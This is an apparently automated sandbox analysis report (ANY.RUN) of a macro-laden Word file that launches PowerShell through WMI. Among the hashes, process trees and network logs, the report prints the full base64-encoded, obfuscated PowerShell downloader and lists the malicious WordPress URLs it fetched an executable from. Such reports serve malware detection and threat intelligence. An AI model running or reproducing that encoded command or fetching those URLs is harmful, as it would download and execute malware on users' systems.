File name:

trust.accs.resourses.doc

Full analysis: https://app.any.run/tasks/78ed4543-fedd-48a7-89cb-0fe23565b623
Verdict: Malicious activity
Analysis date: May 16, 2025, 09:42:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Mar 15 16:04:00 2019, Last Saved Time/Date: Fri Mar 15 16:04:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
MD5:

57BE28414E61FF58A6B52FC3C1B70B7F

SHA1:

C4FBB54B194C1303897AC869811A274303D27F38

SHA256:

01B1232DEE4AC560BA34061AA65F5DE79C7182DE3B6F313AD1A83C39CE61550C

SSDEEP:

3072:aGcrZTVlaTaTpCq2B2NER5eezeL0rhLq1Hjnu5TUp6Oetdac20y8gmDH1yc:H0Z6TBq2xR5eezP5T6k+mvVyc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Gets information about running processes via WMI (SCRIPT)

      • WINWORD.EXE (PID: 7360)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7952)
    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 7360)
  • SUSPICIOUS

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7952)
    • Executed via WMI

      • powershell.exe (PID: 7952)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 7360)
  • INFO

    • An automatically generated document

      • WINWORD.EXE (PID: 7360)
    • Disables trace logs

      • powershell.exe (PID: 7952)
    • Checks proxy server information

      • powershell.exe (PID: 7952)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7952)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2019:03:15 16:04:00
ModifyDate: 2019:03:15 16:04:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 4
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: -
Characters: 4
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe conhost.exe no specs ai.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7360"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Downloads\trust.accs.resourses.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\rpcrt4.dll
7952powershell -e IAAoACAAbgBlAFcALQBvAGIAagBlAEMAdAAgACAAaQBPAC4AQwBvAE0AUABSAGUAUwBTAEkATwBOAC4AZABlAEYAbABBAHQAZQBzAFQAcgBFAGEAbQAoACAAWwBJAG8ALgBNAEUAbQBvAHIAeQBTAHQAcgBlAGEAbQBdAFsAcwB5AHMAdABlAE0ALgBDAE8ATgB2AGUAUgB0AF0AOgA6AGYAUgBPAE0AYgBBAFMAZQA2ADQAUwB0AHIASQBuAEcAKAAoACcAVgBaAEYAaABiADUAJwArACcAcwB3ACcAKwAnAEUASQBiAC8AaQBqACcAKwAnADgAZwAnACsAJwBPAFYARQBXAFAAQwBUADIAWQAnACsAJwBVAFYASQB2AFUAJwArACcARABYAFIAcABNACcAKwAnAHEAMABZADYATwAnACsAJwBvAFUAbQBUAE0AWgBmACcAKwAnAGcAQQBUAFkAJwArACcAQwBVADIAaQBpAC8AUABkADUAVgBSACcAKwAnAE0AcAAnACsAJwA5AC8AJwArACcASAAwADMAJwArACcAUAAnACsAJwB1ACcAKwAnACsAZAArAGYAbwAnACsAJwBlACcAKwAnAHYATABpACcAKwAnAEIAJwArACcARQBKADYAJwArACcAbAA0AG8AYwAnACsAJwBOAGgAcwBhAE8ASAAnACsAJwBkAHoAJwArACcANQAnACsAJwB1AHMAbwBEACcAKwAnAFIAVgBPAGEAMQAzACcAKwAnADgAUgBXAEgASQBJAHgAcgAzAEoAeABaAFIAJwArACcASQAxAEcAWgB3AE0AJwArACcAbQB5ACcAKwAnAEoAJwArACcATQBwACcAKwAnAGgAdABsACcAKwAnAE8AVgBNACcAKwAnAGQAMAAnACsAJwBOAFkAeQBVACcAKwAnAGYAegBWACcAKwAnAGgAeQAnACsAJwBvACcAKwAnADEAQgBWAG0AJwArACcAagBkACcAKwAnAGMAdQBFAEsAMwBiAE8AcgAnACsAJwBXACcAKwAnAHYARwAnACsAJwB5ACcAKwAnAGwAWQB2ACcAKwAnAEUAdgAnACsAJwBHAEwAYgBzACcAKwAnADkAZwBPACcAKwAnAGUAcABzAGsAdABjACcAKwAnAE0ASwBpADYAMQBIACcAKwAnAGgAMgBGACsAJwArACcAegBKACcAKwAnAFgAJwArACcAOQA0AHYARQBKADUAMAArAHgANwBSAEsAWABhADQAJwArACcAawB3ACcAKwAnAEsAcgBZACcAKwAnAHcATgB3AGsAJwArACcAeQAnACsAJwBGAEwAJwArACcAUQA2AHMANgAnACsAJwAyAFcASgBoAHcATQB6AFgAKwBYAEwAJwArACcAdABRAHUAWAA1AFQAaAAnACsAJwB4AFYAZgAnACsAJwBEADMAJwArACcAUwBUAEUAJwArACcATQBMACcAKwAnAEMAJwArACcAMgBxAEMAJwArACcAOQBMAEwAQgB0ADgANABWACcAKwAnAHoAZwBZAFgAcAA2ADEAcABSAEwATgBXAEYAJwArACcAcgBWAE8ARgAnACsAJwBQAGUARQAnACsAJwA2AFAAdQBjADkAZAAnACsAJwBJAHMANgBDACcAKwAnADMAZAAnACsAJwBCAGsANAB6AHcASQAnACsAJwBnAGcAUwAnACsAJwBnAFAANgBjAHMAJwArACcATQBIAG8AQwA5ADEAbwAnACsAJwA4AGsAeQBUAFgAYwBwAHkAUQBrADEAUAB0AGkARwB3AE4AcwAnACsAJwBBAEMARAAyAFEAbgBxAEkASQBIADkAbgBIAHMARAAvAEEAeABBADYAcQAnACsAJwBGADUAdgB4AGcASAAnACsAJwA3AHIAdABjADcAJwArACcANgA3ACcAKwAnADIAJwArACcAaQB2ACcAKwAnACsAJwArACcAbgBxAEkAcgBDAGkATABzACcAKwAnADUAJwArACcASQBnADUAMwAnACsAJwB1AGsAWQB0AHEANAAnACsAJwBkAGoAbQBuACcAKwAnAEMAWgBFACcAKwAnAEsAbgBJADUAKwBQAEoAbwAnACsAJwArACcAKwAnAHIAZgAnACsAJwBqACsAVQBOACcAKwAnAHUAcgBDACcAKwAnAGYAVgAnACsAJwBhAEYAJwArACcANQAnACsAJwArAHMAMgAnACsAJwBKACcAKwAnAG4ALwBoAFAANQBzAEwAJwArACcATgAnACsAJwB4AG4AMwAnACsAJwB3AEEAJwArACcAMwAzADYASgBRACcAKwAnAHgAMwAnACsAJwAvAEQANwBMAGQAawBjACcAKwAnAFgAaQBIAHMAJwArACcAMQA2AGEANwBDADkAYwBHACcAKwAnADYAJwArACcARABhAG0AOABxAHMAJwArACcAdAAnACsAJwA0AGoAOABUAC8AYgAnACsAJwBXAHAATABqAFYAcgAzAHEARwBxACsANAAnACsAJwB3ACcAKwAnAEUAbgA5AFoAJwArACcASgBNAEIAMgBPACcAKwAnADIALwBaADcASAAnACsAJwBOAG4ATgBDAGcAcwBGAG4AcgAnACsAJwA0AEgAJwArACcAUQAnACsAJwBTADMAJwArACcASQBqAHEAZQBEAG8AJwArACcANQBNAGsAOABnAEUAMQBsAEkAdAA1AEQAVwBmAGwAMQBiADEAMwA4AD0AJwApACkAIAAsACAAWwBpAE8ALgBDAG8ATQBwAFIAZQBTAHMAaQBvAE4ALgBjAG8AbQBwAFIAZQBzAHMAaQBPAG4AbQBPAEQARQBdADoAOgBEAEUAQwBPAE0AUAByAGUAcwBTACkAfAAlAHsAbgBlAFcALQBvAGIAagBlAEMAdAAgACAASQBPAC4AcwBUAFIAZQBBAE0AUgBlAGEAZABlAFIAKAAgACQAXwAsAFsAdABFAHgAVAAuAEUAbgBjAG8ARABpAE4AZwBdADoAOgBhAHMAQwBpAGkAKQB9AHwAJQAgAHsAIAAkAF8ALgBSAGUAQQBkAHQAbwBlAG4AZAAoACkAfQApAHwAJgAoACAAJAB2AEUAUgBiAG8AUwBFAFAAUgBlAGYARQBSAEUAbgBDAEUALgBUAG8AcwB0AHIAaQBOAEcAKAApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7960\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8012"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "CEDD34F7-4BA7-41F9-B348-2ECEC5FBD028" "9D2116FA-B279-4107-8757-77BB45BE03F8" "7360"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\rpcrt4.dll
Total events
19 096
Read events
18 745
Write events
331
Delete events
20

Modification events

(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:1/-
Value:
312F2D00C01C000004000000000000008009DFE846C6DB018C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:delete valueName:1/-
Value:
⼱-᳀
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3\0
Operation:writeName:FilePath
Value:
officeclient.microsoft.com\88D522A4-E665-43B6-929C-3114C43B76F3
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3\0
Operation:writeName:StartDate
Value:
5086FBE846C6DB01
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3\0
Operation:writeName:EndDate
Value:
5046651310C7DB01
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\AddinsData\Genko.Connect12
Operation:writeName:LoadCount
Value:
5
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7360
Operation:writeName:0
Value:
0B0E107C50501715DCF242A6DDB2EECE71C6F82300468AF3CAC4EEC8F1ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C039D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(7360) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
Executable files
34
Suspicious files
130
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
7360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:2069B57AF71955909DE1E27AA73562B3
SHA256:AA20771553E7C699779152057CBB8B8D7D0FD5769C678C9D44CDB870C8E1B375
7952powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A2178AD7D1658EF983E6957A298C3393
SHA256:6AA4CDA5B42CBFC9CD9FA3EBBBB1C00478D28AEDE827570A0E4FDDAFA1FA3A99
7360WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:5B6DA58C436DF49A31734C1AF72B1473
SHA256:BBE44D2794AAEAADF0FC51BEC73C357249BB8E47990DF72B32B2BDD560443474
7360WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Jsonbinary
MD5:CFD54484BBCCD842CE5113068C419A8A
SHA256:4FEE36BCBAB47965FD07134DE0BC666ECE4041CD1495D0107B468630BF6ED571
7952powershell.exeC:\Users\admin\15.exetext
MD5:258681343DE55447AE73FE3545813467
SHA256:5F85278AC9EF62CC2260A674BA21CBFC64174C88B59ADA20CB18A74BA697CE02
7360WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187binary
MD5:E62EFE7288ABCE3321A890EAAD8D8E9E
SHA256:A0F87CD29721837A844306B7CDB225C4BFFA893C090F4C6C9A94CFC4F783F0AF
7360WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187binary
MD5:E3A87F389EC4FEB4452EC3C992BBB542
SHA256:6FCD22B5A291E76DBCCA5D2C2BC48DF95186F1388F124837A4E328AE9542333F
7360WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:EB0926DD78A7FD242C965C6BB75EBCC1
SHA256:27FA7FEBD678270D0B92BDB2A94F9C8ADBBD765C4D0634D55ACA001CC6F5C2A2
7360WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:50CCBE7A5B429D586FA35A5A91C75481
SHA256:B540DB22B6CA99163B7CD8478909CD64DD7C2584EB68541ADD39A273AA012EFB
7360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:DD0D5B4D5E3501EE49788898CA7CC8C8
SHA256:A876CBDB697516A04536446D44C9148B17CC619AD83F13CAE2A2EE2DA5BADC6B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
60
DNS requests
31
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.16:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7952
powershell.exe
GET
404
162.254.39.9:80
http://rileyaanestad.com/wp-includes/DXn1R/
unknown
malicious
7360
WINWORD.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7952
powershell.exe
GET
301
45.55.127.109:80
http://www.allgreennmb.com/wp-content/themes/pridezz/t9iV/
unknown
unknown
7360
WINWORD.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
5164
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5164
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7360
WINWORD.EXE
GET
200
23.216.77.19:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2616
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.16:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7360
WINWORD.EXE
52.109.76.240:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7360
WINWORD.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.216.77.16
  • 23.216.77.17
  • 23.216.77.25
  • 23.216.77.26
  • 23.216.77.21
  • 23.216.77.19
  • 23.216.77.22
  • 23.216.77.18
  • 23.216.77.13
  • 23.216.77.28
  • 23.216.77.15
  • 23.216.77.29
  • 23.216.77.30
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
roaming.officeapps.live.com
  • 52.109.76.243
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
omex.cdn.office.net
  • 23.48.23.6
  • 23.48.23.18
  • 23.48.23.30
  • 23.48.23.45
  • 23.48.23.66
  • 23.48.23.11
  • 23.48.23.43
  • 23.48.23.62
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted

Threats

No threats detected
No debug info